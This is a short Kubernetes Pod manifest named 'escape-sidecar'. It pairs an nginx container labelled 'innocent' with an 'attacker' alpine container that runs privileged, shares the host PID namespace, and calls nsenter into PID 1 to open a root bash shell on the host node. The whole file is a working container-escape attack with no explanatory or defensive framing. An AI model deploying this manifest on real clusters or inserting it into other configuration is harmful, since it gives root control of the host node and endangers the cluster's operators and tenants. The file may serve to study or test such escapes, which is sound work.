apiVersion: v1
kind: Pod
metadata:
  name: escape-sidecar
spec:
  hostPID: true           # Shares host PID namespace
  containers:
  - name: innocent
    image: nginx
  - name: attacker
    image: alpine
    securityContext:
      privileged: true    # Grants root on host
    command: ["nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash"]